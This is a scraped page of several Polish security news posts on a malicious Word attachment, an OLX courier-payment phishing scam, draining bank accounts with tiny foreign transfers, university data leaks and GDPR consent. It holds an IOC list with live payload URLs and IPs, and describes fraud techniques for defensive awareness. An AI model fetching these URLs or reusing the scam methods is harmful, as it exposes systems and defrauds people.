E-maile, choć bez polskich liter, to zawierają poprawnie gramatyczną treść i z informacji jakie otrzymujemy od naszych czytelników z firm, księgowe dokumenty otwierają… Te które posiadają zaktualizowaną wersję pakietu Office na szczęście nie muszą się niczym martwić. Atak wykorzystujący tę podatność jest znany od 5 miesięcy, więc należy mieć nadzieję, że większość firm zdążyła już zaktualizować swoje komputery.

Chcesz nauczyć się szybko analizować złośliwe pliki/załączniki, aby móc odpowiedzieć na pytanie, czy załącznik w e-mailu przesłanym do któregoś z Twoich pracowników jest złośliwy i ustalić czy atak był ukierunkowany (wymierzony tylko w Twoją firmę) czy globalny? Jeśli tak, to zapraszamy an 2 dniowe szkolenie z Analizy Malware, które odbędzie się w przyszłym tygodniu w Warszawie i w lipcu w Krakowie. W ciągu 2 dni warsztatów nauczymy Cię jak zbudować skuteczne środowisko do szybkiej analizy złośliwego oprogramowania przy użyciu darmowych narzędzi.

IOC

Poniżej IOC związane z tym atakiem, do zablokowania na waszych TLS-ach i przegrepowania w logach.

Załącznik:
“Potwierdzenie wplaty2018.05.10.doc”
sha256 5dec08f845fc70d855f463370b8da8cc6fb94638400595c02b0cbda646b43fdd
sha1 b23b2a15da68a86db47715392e77985ad7ae588d
md5 bd4eec0d3f3cb2836df5ae89797dcb6c

Dropped malware:

sha256 06d31a5a01dc64ffa39f804226ac59efb7fe490849ad3d5f966145d7ce3e4e0d

Ruch sieciowy:
http://uploadtops.is/1//f/RY2Npnj
http://uploadtops.is/1//f/30c5END
82.221.105.125
78.46.127.120
109.202.107.10
37.233.101.73
93.184.221.240
213.152.161.35

Dziękujemy wszystkim Czytelnikom, którzy poinformowali nas o tym ataku i przesłali nam jego próbki.

Przeczytaj także:

<!-- Similar Posts took 7.089 ms -->

08:06

* Nie ma dyrektywy policyjnej, ale Sejm znalazł obejście problemu

Jak policja ma przetwarzać dane po uchyleniu “starej” ustawy o ochronie danych? Nie bardzo wiadomo i dlatego zaproponowano, by wprowadzenie nowej ustawy o ochronie danych nie wiązało się z całkowitym uchyleniem starej.

Przypomnijmy, że dyrektywa policyjna to drugi obok RODO składnik unijnej reformy ochrony prywatności. Dyrektywa dotyczy przetwarzania danych osobowych przez policję i służby. Ma ułatwić wymienianie się tymi danymi, ale też wprowadza pewne dodatkowe prawa dla obywateli. Pod koniec lutego narzekaliśmy, że rząd nie zrobił nic w celu wdrożenia dyrektywy policyjnej, a czasu już wtedy było niewiele.

Coś drgnęło 19 kwietnia. W Rządowym Centrum Legislacji pojawił się Projekt ustawy o ochronie danych osobowych przetwarzanych w związku z zapobieganiem i zwalczaniem przestępczości. On własnie miał wdrożyć dyrektywę, ale czasu zostało niewiele, a dokument nie dotarł nawet do Rady Ministrów (nie mówiąc już o Sejmie, Senacie, Prezydencie). Służby muszą mieć podstawy prawne do przetwarzania danych osobowych, a dotychczas obowiązująca ustawa o ochronie danych ma zostać uchylona! Co robić!

Interesujący pomysł rozwiązania problemu zaproponowały sejmowe Komisje: Administracji i Spraw Wewnętrznych oraz Sprawiedliwości i Praw Człowieka, po rozpatrzeniu poprawek na posiedzeniu w dniu 10 maja 2018 r. Mówiąc ściślej zaproponowano poniższe brzmienie przedostatniego artykułu nowej Ustawy (czyli tego, który uchyla starą ustawę).

Art. 175. Traci moc ustawa z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2016 r. poz. 922 oraz z 2018 r. poz. 138) z wyjątkiem art. 1, art. 2, art. 3 ust. 1, art. 4–7, art. 14–22, art. 23–28, art. 31 oraz rozdziałów 4, 5 i 7 które zachowują moc w odniesieniu do przetwarzania danych osobowych w celu rozpoznawania, zapobiegania, wykrywania i zwalczania czynów zabronionych, prowadzenia postępowań w sprawach dotyczących tych czynów oraz wykonywania orzeczeń w nich wydanych, kar porządkowych i środków przymusu w zakresie określonym w przepisach stanowiących podstawę działania służb i organów uprawnionych do realizacji zadań w tym zakresie, w terminie do dnia wejścia w życie przepisów wdrażających dyrektywę Parlamentu Europejskiego i Rady (UE) 2016/680 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych przez właściwe organy do celów zapobiegania przestępczości, prowadzenia postępowań przygotowawczych, wykrywania i ścigania czynów zabronionych i wykonywania kar, w sprawie swobodnego przepływu takich danych oraz uchylająca decyzję ramową Rady 2008/977/WSiSW (Dz. Urz. UE L 119 z 4.5.2016, str. 89).”

Znajdziecie tę propozycję na ostatniej stronie tego dokumentu (druk sejmowy 5828-A).

Czy to nie jest przepiękne? Powstanie nowa Ustawa o ochronie danych, która zachowa przy życiu część przepisów starej. Najgorsze, że takie rozwiązanie wydaje się częściowo rozsądne w obliczu problemu stworzonego opieszałością rządu. Policja musi jakoś przetwarzać dane, a rząd po prostu nie miał czasu zająć się sprawą tak ważną dla funkcjonowania służb.

Wypada jeszcze dodać, że ciągle czekamy na ustawę o Krajowym systemie cyberbezpieczeństwa, która wdraża dyrektywę NIS. Termin wdrożenia tej drugiej dyrektywy minął 9 maja.

Przeczytaj także:

<!-- Similar Posts took 6.969 ms -->

May 10 2018

09:09

Konta w BZ WBK można wyczyścić przelewami przychodzącymi

Jeden z naszych Czytelników otrzymał przelew na konto w BZ WBK, na kwotę niecałych 8 zł, ale w walucie obcej. Bank pobrał w związku z tym opłatę za przyjęcie przelewu walutowego, która to opłata wynosi… 10 zł. Co by było, gdyby ktoś wysłał 100 przelewów po 0.01 euro?

Ja nie chciałem tego przelewu!

Czytelnik zapewniał nas, że nie zgadzał się na “przyjęcie przelewu”, a mimo to za nie zapłacił.

Problem w tym, że nikt nie pytał mnie o zdanie czy chcę go (przelew – red.) przyjąć. Skontaktowałem się z obsługą banku pytając co w sytuacji, gdyby ktoś tak o przesłał mi 100 przelewów po 0.01 euro. Odpowiedź w załączniku. Niestety nie udało mi się skopiować całości rozmowy ponieważ okno się przełączyło na ankietę.

Odpowiedź banku była prosta. Gdyby ktoś wysłał 100 przelewów na 0.01 euro, na koncie powstałby debet!

Nie bardzo chciało nam się wierzyć, że wyczyszczenie komuś konta w banku może być tak proste. Musimy dodać, że w dalszej części rozmowy pracownik banku (pan Kamil) wspomniał o możliwości złożenia reklamacji.

Bank nie widzi problemu

6 marca zwróciliśmy do banku z pytaniami w tej sprawie. Później telefonowaliśmy aby się przypomnieć. 16 marca otrzymaliśmy obietnicę, że ktoś prześle nam odpowiedź “po południu”. Zakładaliśmy, że skoro na tę odpowiedź trzeba było tak długo czekać, będzie się ona wiązać z jakimiś głębszymi wyjaśnieniami odnośnie mechanizmów ochronnych. Ewentualnie bank mógł zwlekać by wprowadzić zmiany do usługi. Myliliśmy się.

Oto odpowiedź jakie udzieliła nam Ewa Krawczyk z Banku Zachodniego WBK (w całości).

Dzień Dobry Panie Marcinie,

Rachunki prowadzone są w oparciu o regulamin, który nie przewiduje konieczności uzyskiwania zgody klienta na przelew przychodzący.
Oczywiście klient zawsze może złożyć reklamację, która zostanie rozpatrzona indywidualnie (czytaj: nie musi być rozpatrzona pozytywnie – red.).
Natomiast co wskazanego przez Pana ryzyka, zleceniodawca także ponosi opłatę za zlecenie przelewu zagranicznego, zatem z jego punktu widzenia byłaby to operacja nieopłacalna :)

Hnmmmm… możliwość złożenia reklamacji jest niczym lek na każdy problem :)

Niestety naszym zdaniem nadal istnieje możliwość z wyczyszczenia czyjegoś rachunku licznymi drobnymi przelewami. Opłaty za przelewy zagraniczne są często znacznie niższe niż 10 zł (a w niektórych sytuacjach nawet darmowe). Poza tym ktoś ze złośliwym nastawieniem mógłby nawet chcieć dopłacić aby uprzykrzyć komuś życie. W tym przypadku regulamin świadczenia usług skonstruowany jest w taki sposób, że klient nie może kontrolować wydatków na usługę, której wyświadczenie jest niezależne od niego. To nie jest dobre, a możliwość złożenia reklamacji oznacza możliwość ubiegania się o zwrot kosztów, ale wcale nie oznacza gwarancji uzyskania zwrotu tych kosztów.

Uznaliśmy, że klienci BZ WBK mają prawo o tym wiedzieć. Podejrzewamy zresztą, że podobny problem może dotyczyć także klientów innych banków. Jeśli więc znacie jakieś poważniejsze problemy spowodowane przez otrzymywanie niechcianych przelewów międzynarodowych lub problemy z reklamacjami takichże, to dajcie nam znać.

Tym razem bez “co robić, jak żyć”?

Zazwyczaj w naszych artykułach radzimy jak zminimalizować ryzyko opisywanego w tekście “ataku”. Tutaj niestety nie przychodzi nam nic do głowy. Można oczywiście poszukać banku, który ma inny cennik — ale wedle naszej wiedzy żaden z banków nie pozwala na zablokowanie otrzymywania przelewów międzynarodowych (i w niektórych sytuacjach każdy z banków pobierze opłatę). Wydaje się więc, że tego typu problem (przelew na kwotę niższą niż obciążenie rachunku odbiorcy) powinien być wychwytywany przez system bankowy i odrzucany. Czy któryś z banków tak robi?

Choć rad minimalizujących ryzyko w tym tekście nie ma, to zakończmy go przypomnieniem naszego starszego artykułu pt. 6 rad, jak bezpiecznie wykonywać przelewy. Warto go podesłać swoim księgowym :)

Przeczytaj także:

<!-- Similar Posts took 6.634 ms -->

07:53

Uważajcie na rzeczy oddawane “za darmo” na OLX

O przekrętach na OLX z lewym kurierem w tle napisaliśmy już wiele artykułów. Wciąż jednak są osoby, które się na nie łapią — głównie dlatego, że taka “okazja” wyłącza im logiczne myślenie. No bo jakże nie przejść obojętnie obok oferty darmowego oddania w dobre ręce lekko używanego zestawu klocków, albo jeszcze całkiem sprawnego telewizora? Przez ten przekręt na OLX ludzie którzy chcą zaoszczędzić kilkaset złotych, tracą nawet kilkadziesiąt tysięcy… A fala tego typu ataków ostatnio się nasiliła i niestety są one lepiej dopracowane niż poprzednie “edycje”.

Interesuje Cię jak bezpiecznie korzystać z internetu w domu i pracy? Przyjdź na nasz wykład pt. “Jak nie dać się zhackować?“. W najbliższym tygodniu będziemy w Krakowie, Warszawie, Łodzi i Gdańsku. Zarezerwuj miejsce dla siebie klikając tutaj

Jak wyglądają ogłoszenia złodzieja na OLX?

Oto przykład jednego z nich:

Oddam za darmo zestaw kolckow Lego Duplo zoo. Dzieci powyrastały więc moze komus sie przyda :)

Powód oddania jest wiarygodny. A przestępca — jak widać po komunikacie z OLX — z oszustwa zrobił sobie stały dochód, ponieważ na wiadomości odpowiada błyskawicznie. Jest ciągle przed komputerem z jeszcze jednego powodu… (o nim za chwile).

Popatrzcie jak wygląda przykładowa korespondencja z oszustem, którą podesłał nam jeden z Czytelników. Zwróćcie uwagę, że Czytelnik nie należał do “chciwych” i chciał zapłacić za klocki — ale oszust nie chciał wpłaty, ale jedynie pokrycia kosztów transportu:

Przesłany e-mailem link do płatności za usługi kurierskie wyglądał tak:

https://pay24iv[.]com/
?tid=l41Wte0709CvxjOX4nNqwpKWklJoy9S8
&gat=U4CqsATwC2tANmQf
&highlo=TLXocyd9YoTe3ExqClr1pHBfsoiniCte461S7CdXe0xzYrzF
&crypt=rItjlipIjiHyLLQ1boqk0J50tQnnzhcR6ml4Tureorg2prZfxC6E6zsxEoDgZZwE
&newuser=6
&tax=nHQg6RAboerETtRT1geOf7HbOgFKkGlITLcZH3eFahBlP4sRPHl2LZ3SZric03HYRKmXHgLq2
&kwota=19.99

A w innym, analogicznym przypadku tak:

https://dpay24[.]online/
?tid=l41Wte0709CvxjOX4nNqwpKWklJoy9S8
&gat=U4CqsATwC2tANmQf
&highlo=TLXocyd9YoTe3ExqClr1pHBfsoiniCte461S7CdXe0xzYrzF
&crypt=rItjlipIjiHyLLQ1boqk0J50tQnnzhcR6ml4Tureorg2prZfxC6E6zsxEoDgZZwE
&newuser=5
&tax=nHQg6RAboerETtRT1geOf7HbOgFKkGlITLcZH3eFahBlP4sRPHl2LZ3SZric03HYRKmXHgLq2
&kwota=11.99

A pod nim — jak można się domyślić — fałszywy DotPay.

Jak widać, przestępcy w końcu dopracowali i unowocześnili skrypt. Ten fałszywy DotPay nie zawiera pomyłek, które funkcjonowały w poprzedniej wersji oszustwa. Nawet podrobione strony “szybkich płatności” dla danego banku mają aktualny wygląd.

Jak złodziej okrada ofiary?

Jeśli klient po wybraniu swojego banku nie zauważy, że login i hasło wpisuje na stronie o złym (niebankowym) adresie, to straci pieniądze. I tu docieramy do tego, dlaczego przestępca musi ciągle być przed komputerem. Otóż po wpisaniu loginu i hasła do bankowości przez ofiarę, ofierze pokazuje się fałszywy ekran potwierdzenia płatności wymagający wpisania jednorazowego kodu. I ofiara ten kod dostaje (zazwyczaj SMS-em), więc wszystko przebiega jak w trakcie normalnej transakcji. A to dlatego, że zaraz po zalogowaniu się ofiary na stronie oszusta, oszust widzi i ręcznie kopiuje do prawdziwego banku login i hasło klienta (loguje się na jego konto).

Po zalogowaniu oszust ma kilka możliwości okradzenia ofiary:

  • Zleca przelew na inny rachunek i na wyższą kwotę. Ofiara dostaje wtedy SMS-a autoryzującego przelew, ale na wyższą kwotę.
  • Definiuje odbiorcę zaufanego. Ta operacja też wymaga potwierdzenia operacji kodem jednorazowym. Ten kod jest przesyłany na telefon ofiary i jeśli ofiara nie zauważy opisu transakcji w SMS-ie (że nie jest to potwierdzenie zlecanego przelewu a dodawanie zaufanego odbiorcy), to niestety straci wszystkie środki — zostaną one już bez konieczności dalszej autoryzacji kodem jednorazowym wytransferowane w najbliższych minutach.
  • Wyprowadza środki w inny, charakterystyczny dla danego banku sposób (niektóre z banków pozwalają na niewymagające autoryzacji przelewy do pewnych usług. Ofiara traci pieniądze, a przestępca “po drugiej stronie usługi” je odbiera).

 

Nowy GMail ostrzega przed atakami

Jeśli korzsytacie z GMaila, warto przełączyć się na jego nowy interface. Ostrzeżenia przed e-mailami zawierającymi złośliwe URL-e na nowym interface są o wiele wyraźniejsze:

Zalogowałem na fałszywej stronie banku — co robić, jak żyć?

Jeśli zalogowałeś się na fałszywej stronie banku, jak najszybciej zadzwoń na infolinię zgłoś to bankowi. W trakcie oczekiwania na połączenie z konsultantem

  1. zmień hasło do konta (i każdego innego miejsca, w którym miałeś takie samo hasło)
  2. przejrzyj historię transakcji pod kątem przelewów, których nie zleciłeś (sprawdź także przelewy “oczekujące na zrealizowanie”/”operacje planowane”, które mogą nie być widoczne w historii rachunku).
  3. przejrzyj odbiorców zaufanych i zweryfikuj czy numery kont, które dla nich zdefiniowałeś są poprawne (mogły zostać podmienione)
    zastanów się jakie dane Twój bank ujawnia na Twój temat po zalogowaniu (np. historię transakcji, ostatnie 4 cyfry karty płatniczej?) i oceń, czy ta wiedza w czyichś rękach może być problemem. Przykładowo znajomość 4 ostatnich cyfr karty płatniczej, może oszustowi posłużyć do zresetowania dostępu do np. Twojego konta Apple lub Amazon (jeśli miałeś tam tę kartę podpiętą).

 

Przekrętów okradających Polaków w sieci jest więcej

Oszustwo na kuriera to tylko jeden z obecnie wykorzystywanych przez polskich złodziejów numerów, który wykorzystują do okradania Polaków. Niestety, sposobów na które możesz stracić pieniądze (albo dane) jest więcej. Zebraliśmy je wszystkie w 3 godzinny wykład, z którym w najbliższych dniach odwiedzimy:

Wpadnij i zobacz na czym polegają te ataki oraz dowiedz się jak najlepiej zabezpieczyć przed cyberprzestępcami swoje pieniądze, dane oraz najbliższych. Miejsce na wykład możesz zarezerwować klikając tutaj.

Przeczytaj także:

<!-- Similar Posts took 7.150 ms -->

May 09 2018

20:11

Interia stawia warunek: Wyraź nową zgodę albo zapłać za pocztę. Czy to zgodne z RODO?

Wiele firm prosi o nowe zgody na przetwarzanie danych w związku ze zbliżającym się RODO. Interia stawia sprawę twardo — albo wyrazisz nową zgodę albo musisz zacząć płacić za pocztę. Użytkownicy czują się przyparci do muru i sugerują, że Interia wymusza zgody w sposób, za jaki RODO wręcz karze. Ale tak “wymuszona” zgoda może spełnić warunki “dobrowolnej zgody” w rozumieniu RODO.

RODO idzie, weźże wyraź zgodę

Już od pewnego czasu osoby logujące się do poczty Interii widzą komunikat taki jak ten poniżej:

zrzut strony

Interia zbiera zgody przed RODO

Komunikat informuje o wejściu w życie RODO oraz o tym, jakie dane dostawca poczty chce przetwarzać. Użytkownicy muszą dokonać wyboru czy:

  • chcą korzystać z poczty płatnej lub
  • korzystać z poczty darmowej, ale wyłącznie po wyrażeniu nowej zgody.

Wyboru należy dokonać do 25 maja. Potem konto zostanie zablokowane (potwierdziły nam to osoby z BOK-u Interii). Wiele osób napisało do nas w tej sprawie, zarzucając Interii manipulację i naruszanie zasad RODO. A co w tej sprawie ma do powiedzenia Interia? Oto jakich wyjaśnień udzieliła naszym Czytelnikom:

Po 25 maja 2018 konto bezpłatnie zostanie usunięte, jeżeli nie wyrazi Pani gody na przetwarzanie danych. Nie będzie Pani mogła się ani zalogować, ani wysłać maili ani odbierać maili, ponieważ konta po tym czasie nie będzie.

Jeżeli nie chce Pani dalej korzystać z konta, ale nie chce Pani akceptować tychże zgód polecamy zakup konta premium (koszt 14,76 zł usługa ważna 12 miesiecy)

Bądźmy szczerzy…

Zacznijmy od tego, że jeśli usługa jest bezpłatna to zazwyczaj płacimy za nią swoimi danymi. Niestety przyzwyczailiśmy się do internetu, w którym sprawy nie były stawiane tak jasno jak powinny. Wciąż pokutuje przeświadczenie, że w internecie korzystamy z usług bezpłatnie. Piękna to wizja, choć fałszywa. Wizja, w której usługodawcy starają się jak najbardziej udawać, że nie spieniężają naszych danych. My udajemy, że czytamy regulaminy i wiemy co one zawierają. A regulaminy i polityki prywatności z kolei udają przejrzyste i zrozumiałe dokumenty… i wszyscy są szczęśliwi!


Interia tym razem postanowiła nie udawać. Postawiła sprawę jasno. Oczywiście w tym kontekście można dyskutować o “dobrowolności zgody”. Jeśli korzystaliście z usług Interii wcześniej to teraz możecie czuć się przyparci do muru. Możecie odnieść wrażenie, że ktoś tu od was zgodę wymusza. Tylko czy jest to “karalne” wymuszanie zgody w rozumieniu RODO?

RODO i “dobrowolna zgoda”

Wielu z naszych Czytelników czytało RODO, więc wielu z nich zwróciło uwagę na art. 7 ust 4 rozporządzenia.

Oceniając, czy zgodę wyrażono dobrowolnie, w jak największym stopniu uwzględnia się, czy między innymi od zgody na przetwarzanie danych nie jest uzależnione wykonanie umowy, w tym świadczenie usługi, jeśli przetwarzanie danych osobowych nie jest niezbędne do wykonania tej umowy.

Również w preambule RODO napisano, że “wyrażenia zgody nie należy uznawać za dobrowolne, jeżeli osoba, której dane dotyczą, nie ma rzeczywistego lub wolnego wyboru oraz nie może odmówić ani wycofać zgody bez niekorzystnych konsekwencji“. W tym przypadku odmowa zgody może mieć pewne “niekorzystne konsekwencje”, ale z drugiej strony… pewien wybór istnieje. To ciekawy dylemat, ale wy chcecie konkretów i pytacie wprost:

Czy oni mogą to robić?

Od początku mieliśmy swoją teorię na ten temat, ale chcieliśmy pogadać z fachowcami i z samą Interią. Niestety rzecznik prasowy Interii był nieosiągalny. Zgadujemy, że wyjechał na majówkę i to akurat w momencie, gdy portal zaczął na poważnie informować ludzi, że mogą stracić dostęp do poczty.

Pytania zadaliśmy więc prawnikowi Bartoszowi Pudo związanemu z Kancelarią Adwokatów i Radców Prawnych Ślązak, Zapiór i Wspólnicy. Pan Bartosz specjalizuje się właśnie w tematyce ochrony danych. Oto jego komentarz.

W przywołanej przez Pana sprawie, pomimo iż praktyki takie mogą być oceniane negatywnie, pozostają w zgodzie z przepisami prawa. Administrator może zaoferować klientom pewnego rodzaju profity w zamian za udzielenie zgody na przetwarzanie danych osobowych np. w celu marketingowym. Ważnym jest, by brak zgody nie uniemożliwiał skorzystania z usługi, nawet jeżeli miałoby to wówczas charakter odpłatny. Oczywiście warto przyjrzeć się w każdym tego rodzaju przypadku szczegółowym warunkom oferowanym przez administratora, zarówno w wariancie „promocyjnym” i „pozapromocyjnym”. Naruszeniem pozostawać będzie bowiem takie skonstruowanie oferty, które de facto blokować będzie swobodę udzielenia zgody, np. poprzez zaproponowanie wariantu odpłatnego, lecz wycenianego rażąco wysoko, nieadekwatnie do zakresu i charakteru świadczonej usługi

Konto płatne w Interii kosztuje 11 zł za pół roku lub niecałe 15 zł rocznie. Raczej nie jest to rażąco wysoka wycena. Tych opłat można uniknąć w zamian za zgodę na coś, co Interia i tak już robiła. Po prostu teraz portal bardziej otwarcie poprosił o zgodę, bo RODO wymaga właśnie tego, żeby wszystko było jasne.

Oczywiście RODO może być w sposób instrumentalny wykorzystane do uzyskiwania nowych, niepotrzebnych zgód. Tauron rozesłał do ludzi pisma dotyczące rzekomej aktualizacji danych, podczas gdy w istocie firma chciała pozyskiwać nowe zgody na kontakt marketingowy. Interia zagrała uczciwiej.

W przypadku wielu usług online potrzeba uzyskania nowych zgód wynika z tego, że w RODO wprowadzono pojęcie profilowania, wcześniej niestosowane w prawie ochrony danych (choć dobrze znane rynkowi). RODO wymaga uzyskania zgody na profilowanie, a to jest coś co Interia robiła i będzie robić. Profilują nas również inne firmy, nie tylko takie jak opisywany przez nas Selectivv, czy głośna ostatnio Cambridge Analytica. Przykładowo operatorzy telekomunikacyjni profilują klientów od dawna, ale nie od zawsze prosili o zgody na profilowanie. RODO wymaga więcej uczciwości, a uczciwość nie zawsze wygląda tak ładnie jak dotychczasowe udawanie.

Przeczytaj także:

<!-- Similar Posts took 10.248 ms -->

May 08 2018

18:01

Wyszukiwarki studentów, publiczna lista usterek i niebezpieczne punkty ksero, czyli uczelnianych wpadek cz. IV

Opisywanie wpadek bezpieczeństwa na uczelniach wyższych to już nasza tradycja. W poprzednich trzech odcinkach pisaliśmy m.in. o wyciekach CV studentów i niedociągnięciach systemów bubliotecznych, ujawnianiu dokumentów z PESEL-ami oraz o koparkach kryptowalut na stronach uczelni. To wszystko było okraszone drobniejszymi klasycznymi wpadkami w stylu “brak BCC” albo “głębokie ukrycie”.

Kontynuujemy cykl i od razu ujawniamy, że w tym odcinku mamy przypadki dotyczące następujących uczelni:

  • Akademia Górniczo-Hutnicza w Krakowie (po raz czwarty w naszym cyklu :)),
  • Politechnika Warszawska (również po raz czwarty!),
  • Politechnika Wrocławska (po raz drugi!),
  • Uniwersytet Ślaski w Katowicach (po raz trzeci!),
  • Politechnika Śląska (po raz drugi)
  • Akademii Morska w Gdyni,
  • Uniwersytet Mikołaja Kopernika w Toruniu,
  • Uniwersytet Ekonomiczny w Katowicach,
  • Uniwersytet Ekonomiczny we Wrocławiu.

Poza tym wspomnimy o wątpliwości co do komputerów w punkcie ksero Wyższej Szkoły Informatyki i Zarządzania w Rzeszowie. Wrócimy też do tematu studniówek i powzdychamy do Ministerstwa Sprawiedliwości za ciągłe ignorowanie problemu bezpieczeństwa osób zdających egzamin adwokacki czy radcowski.

Zaczynamy.

Akademia Górniczo-Hutnicza i wyszukiwarki oraz pliki z hasłami

Ciągle powracającym problemem jest uruchamianie przez uczelnie różnych wyszukiwarek studentów. Na stronie wydziału geologii AGH w Krakowie znalazł się interesujący formularz.

Pod innym adresem była nowsza wersja tego samego narzędzia! Wpisanie do tej wyszukiwarki czyjegoś nazwiska zwracało imiona, nazwiska i numery albumu.

Jeszcze ciekawsze wyniki dostawało się wpisując w pierwszym polu cyfrę “1”.

W pierwszej wersji wyszukiwarki naliczyliśmy ponad 8,4 tys. zestawów imię, nazwisko, numer.

Czytelnik, który powiadomił nas o tej wyszukiwarce, znalazł również publicznie dostępny plik PDF z nazwiskami i numerami PESEL 147 osób, którym przyznano lub nie przyznano miejsc w domu akademickim. Dokument zawierał także imię ojca, informacje o dochodzie na osobę oraz o złożeniu wniosku o stypendium socjalne.

Ostatnią z ciekawostek wypatrzonych na serwerze AGH był plik o niepokojącej nazwie passwd.txt. Zawierał ponad 2,4 tys. wierszy takich jak te.

Wszystko co tutaj opisaliśmy zostało usunięte kilka godzin po tym, jak zgłosiliśmy sprawę AGH. Myśleliśmy, ze to będzie koniec, ale potem nasz Czytelnik wyszperał coś takiego.

Ten plik akurat to nie był żaden wyciek. Pensje były zbyt wysokie, a nazwisk nie udało się skojarzyć z pracownikami uczelni. Biuro prasowe AGH szybko zapewniło nas, że to prawdopodobnie plik stworzony na potrzeby jakichś zajęć.

Politechnika Warszawska – wyszukiwarka studentów

Na pewnej stronie ciągle znajduje fajna wyszukiwarka studentów PW. Wystarczy wpisać kilka znaków, aby znaleźć nazwiska zawierające dany łańcuch.

Kliknięcie na wynik wyszukiwania wyświetla informacje o przedmiotach, na które dany student jest zapisany.

Narzędzie interesujące, ale jednak niebezpieczne (przynajmniej naszym zdaniem). Adres, na którym wyszukiwarka ciągle jest dostępna, nie należy do uczelni. Autor wyszukiwarki udostępnił skrypt na Githubie i po jego pobieżnym przejrzeniu można było ustalić, że pobiera on dane z systemu ERES2 udostępnianego przez samą Politechnikę. Dane z systemu można było przeglądać także bez skryptu, posługując się zwykłą przeglądarką. Obecnie system nie udostępnia tak wielu danych jak wcześniej.

Do autora skryptu trudno mieć pretensje skoro stworzył jedynie narzędzie ułatwiające przeglądanie publicznie dostępnych informacji. Tylko co na to uczelnia, która udostępniła nazwiska z numerami albumów? Już nie raz pisaliśmy, że udostępnianie tak zorganizowanych danych może być niebezpieczne.

Zgłosiliśmy sprawę Politechnice. Rzeczniczka PW Izabela Koptoń-Ryniec po 6 dniach poinformowała nas, że “dostęp do numerów albumów i zajęć studentów został zablokowany”, a ponadto “ogólnodostępność danych w systemie ERES zakwalifikowano jako incydent bezpieczeństwa”.

W odniesieniu do stron pozostających poza domeną uczelni tj. pw.edu.pl, Politechnika Warszawska nie jest ich administratorem, w związku z czym nie ma możliwości edycji danych na tych stronach zawartych.
Jednocześnie administratorzy stron pozostających w domenie pw.edu.pl zostali poinformowani o odpowiedzialności z tytułu publikowania danych osobowych.
W najbliższym czasie zostanie również przygotowana informacja na potrzeby poszczególnych Wydziałów Politechniki Warszawskiej, o tym jakie dane mogą być publikowane na ogólnodostępnych stronach uczelni.

Politechnika Śląska – zmiana ocen była możliwa

Jeden z naszych Czytelników – Grzegorz – niegdyś związany z Politechniką Śląską, odnalazł na pulpicie stacji roboczej w sali laboratoryjnej plik o nazwie lab_pro_lite. Domyślił się, że była to wersja systemu  LabPro z roku 2006 (Lab Pro to internetowy katalog do zajęć laboratoryjnych). Grzegorz nie wiedział, czy była to wersja wykorzystywana jako robocza wersja dla studentów, czy jako materiał dydaktyczny. Prosta analiza struktury katalogów dała jednak wiedzę o tym gdzie znajdują się backupy bazy danych.

Grzegorz zauważył, że dane dostępowe na konta administracji nie różnią się pomiędzy zrzutem bazy z 2014 roku a tym z 2018. Ustalił, że można uzyskać dostęp do systemu oceniania, danych personalnych, zmiany ocen. Nie wykorzystał tego dostępu w złośliwy sposób, ale też nie był pewien czy i jak to zgłosić. Postanowił przekazać sprawę nam, a my skontaktowaliśmy się z Politechniką.

Po przeanalizowaniu sprawy rzecznik uczelni Paweł Doś przekazał nam następujące wyjaśnienie.

Wymieniona wersja i plik były użytkowane w wymienionej sali laboratoryjnej przez studentów wyłącznie w celach przykładowej instalacji i wypełnienia podstawowymi danymi prostego systemu wspomagania prowadzenia elektronicznego katalogu zajęć laboratoryjnych, jakim jest oprogramowanie Labpro. Oczywiście wymieniony plik nie powinien pozostać na pulpicie żadnego komputera po zakończeniu wymienionych zajęć, ponieważ stwarzało to m.in. zagrożenie wykorzystania jego zawartości w sposób zasygnalizowany przez Państwa. Zawartość komputerów w salach laboratoryjnych jest cyklicznie odtwarzana do stanu początkowego, obsługa wymienionych sal laboratoryjnych zwiększyła częstotliwość takiego odtwarzania i wprowadziła dodatkowe ograniczenia.

Uczelnia przekazała nam jeszcze dodatkowe informacje o skali problemu i podjętych działaniach.

a) zasady sporządzania backupu systemu Labpro zostały zmienione, na wymienionym serwerze nie są aktualnie sporządzane i przechowywane kopie zapasowe systemu;
b) wszystkie hasła dostępowe zostały zmienione, zarówno tzw. administratorów, jak i kilkunastu nauczycieli, którzy korzystają z systemu, oraz studentów, którzy za pomocą systemu komunikują się z nauczycielami;
c) system Labpro jest systemem o niewielkim zasięgu, jest wykorzystywany w jednej jednostce wewnętrznej Politechniki Śląskiej, obecnie przez kilkunastu nauczycieli akademickich; w systemie są stosowane sztywne reguły tworzenia dedykowanych loginów oraz hasła niepowiązane z innymi systemami Uczelni, co zdecydowanie ogranicza możliwość wykorzystania ew. ujawnionych danych;
d) system Labpro ma charakter narzędzia wspierającego komunikację pomiędzy nauczycielem pracującym z sekcją laboratoryjną i studentami z takiej sekcji – wystawiania ocen cząstkowych za poszczególne zadania, przesyłania raportów i informacji zwrotnych; do wprowadzania przez nauczycieli akademickich ocen dokumentujących formalnie zaliczenie wszelkich form zajęć dydaktycznych na Politechnice Śląskiej służą inne systemy, w szczególności  System Obsługi Toku Studiów  z modułem EKOS (Elektroniczny Katalog Ocen Studenta) oraz Platforma Zdalnej Edukacji;
e) żaden z nauczycieli akademickich nie zgłosił niepoprawności we wprowadzonych w systemie Labpro ocenach i przesłanych sprawozdaniach; system dokumentuje wewnętrznie każde logowanie i opatruje wszystkie wprowadzane oceny i sprawozdania znacznikiem czasowym; przegląd tych logów i logów serwera nie wykazał niepoprawności we wprowadzaniu danych do systemu (oprócz nietypowych aktywności związanych z dostępem do folderu backups w roku 2014 i 2018);
f) w systemie w odniesieniu do studentów są wykorzystywane mimimalne dane: imię, nazwisko, dane związane z logowaniem i przynależność do grupy studenckiej; ograniczono elementy funkcjonalności systemu Labpro, które nie były intensywnie wykorzystywane, a które są udostępniane przez inne systemy uczelni, m.in. Platformę Zdalnej Edukacji; w szczególności ograniczono dostęp do materiałów pomocniczych do domeny Politechniki Śląskiej.

Politechnika Warszawska – system usterek

Wydział Matematyki i Nauk Informacyjnych PW rozwiązał problem usterek poprzez informatyzację. Na specjalnej stronie uruchomiono system zgłaszania i monitorowania usterek.

Wiedza o usterkach jest podwójnie cenna. Po pierwsze, łatwo się podać za kogoś kto przyszedł naprawić okno w pokoju pracowników albo – co gorsza – przyszedł naprawić komputer czy drukarkę. Po drugie, niektóre usterki dotyczyły systemów dostępu.

